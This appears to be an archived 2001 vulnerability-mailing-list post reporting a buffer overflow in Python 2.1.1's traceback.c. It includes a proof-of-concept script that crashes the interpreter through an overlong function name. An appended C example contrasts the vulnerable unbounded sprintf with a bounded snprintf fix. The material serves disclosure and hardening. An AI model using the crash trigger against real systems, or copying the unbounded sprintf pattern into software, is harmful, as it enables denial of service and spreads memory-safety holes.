Vulnerability Development mailing list archives

Buffer overflow in Python code


From: Giorgio <deneb () unixwave org>
Date: Sun, 25 Nov 2001 11:31:03 +0100

Hi,
I've found a buffer overflow in the Python 2.1.1 source code. (Maybe there are many others.)
The buffer overflow is in the file traceback.c in the directory Python of the 
Python source code.
Simply, there's a sprintf done in this way:
sprintf(linebuf,FMT,filename,lineno,name)
What causes the overflow is the name parameter, which could be > 1000 (linebuf size).
Alex Martelli <aleax () aleax it> has submitted the bug on SourceForge as
485175, and produced the following script to demonstrate the overflow:

#!/usr/local/bin/python
# Python 2 syntax (the bug is in the 2.x interpreter).

# A 1000-character function name: longer than the 1000-byte linebuf
# that traceback.c formats the name into.
name = 'prova'*200

# Write a module defining a function with that name; its body raises
# ZeroDivisionError so that a traceback has to be formatted.
fou = open('fatto.py','w')
print>>fou, 'def',
print>>fou, name,
print>>fou, '():'
print>>fou, '  return 1/0'
fou.close()

import fatto
print 'prima (%d)'%len(name)
funz = getattr(fatto, name)
try:
    funz()
except:                      # was "Except:" in the original post, a typo
    print 'beccato'
    raise                    # re-raising makes the interpreter format the traceback


which causes a segmentation fault in the Python interpreter. That bug is
still present in Python 2.0.


Cheers,
deneb.
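The pattern the post describes, as an added example that is not code from the post or from the Python source tree: a fixed 1000-byte linebuf filled by an unbounded sprintf, next to a bounded replacement that reports truncation instead of writing past the buffer. The contents of FMT, the filename "fatto.py" and the struct/guard-byte check are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Size of the traceback line buffer, as stated in the post (1000 bytes). */
#define LINEBUF_SIZE 1000

/* The post names the format macro FMT but does not show its contents,
 * so this layout of a traceback line is an assumption. */
#define FMT "  File \"%s\", line %d, in %s\n"

/* Vulnerable pattern from the post: sprintf has no bound, so a function
 * name longer than the buffer runs past the end of linebuf. Kept here only
 * for the contrast; never called with an overlong name. */
static void format_line_unbounded(char *linebuf, const char *filename,
                                  int lineno, const char *name)
{
    sprintf(linebuf, FMT, filename, lineno, name);   /* unbounded write */
}

/* Hardened replacement: snprintf writes at most size bytes and always
 * NUL-terminates. Returns true if the whole line fit, false if it was
 * truncated, so the caller can shorten the name or flag it. */
static bool format_line_bounded(char *linebuf, size_t size, const char *filename,
                                int lineno, const char *name)
{
    int needed = snprintf(linebuf, size, FMT, filename, lineno, name);
    if (needed < 0) {            /* encoding error: leave an empty line */
        linebuf[0] = '\0';
        return false;
    }
    return (size_t)needed < size; /* needed excludes the NUL; >= size means cut */
}

/* Builds the post's overlong name ('prova' repeated) into caller storage. */
static size_t build_long_name(char *out, size_t out_size, int repeats)
{
    const char *piece = "prova";
    size_t piece_len = strlen(piece), n = 0;
    for (int i = 0; i < repeats && n + piece_len < out_size; i++) {
        memcpy(out + n, piece, piece_len);
        n += piece_len;
    }
    out[n] = '\0';
    return n;
}

struct result {
    bool fit;          /* did the line fit without truncation? */
    size_t len;        /* bytes actually placed in linebuf */
    bool guard_intact; /* byte just past linebuf untouched? */
};

/* Formats one line into a 1000-byte buffer followed by a guard byte, then
 * reports whether the guard survived (constructed check, not from the post). */
static struct result run_case(const char *name)
{
    char storage[LINEBUF_SIZE + 1];
    memset(storage, 0, sizeof storage);
    storage[LINEBUF_SIZE] = 0x7f;   /* guard byte right after linebuf */
    struct result r;
    r.fit = format_line_bounded(storage, LINEBUF_SIZE, "fatto.py", 1, name);
    r.len = strlen(storage);
    r.guard_intact = (storage[LINEBUF_SIZE] == 0x7f);
    return r;
}

/* The post's scenario: a 1000-byte name ('prova' * 200). */
static struct result long_name_case(void)
{
    char name[5 * 200 + 1];
    build_long_name(name, sizeof name, 200);
    return run_case(name);
}

/* An ordinary short name, which fits in either formatter. */
static struct result short_name_case(void)
{
    return run_case("f");
}

int main(void)
{
    char linebuf[LINEBUF_SIZE];
    format_line_unbounded(linebuf, "fatto.py", 1, "f");  /* fine for short names */
    fputs(linebuf, stdout);

    struct result r = long_name_case();
    printf("long name: fit=%d len=%zu guard_intact=%d\n",
           r.fit, r.len, r.guard_intact);
    return 0;
}
```

With the bounded formatter the 1000-byte name yields a truncated line of 999 bytes plus the terminating NUL, the guard byte is untouched, and the false return value tells the caller that truncation happened; the sprintf version would have written the same line past the end of linebuf.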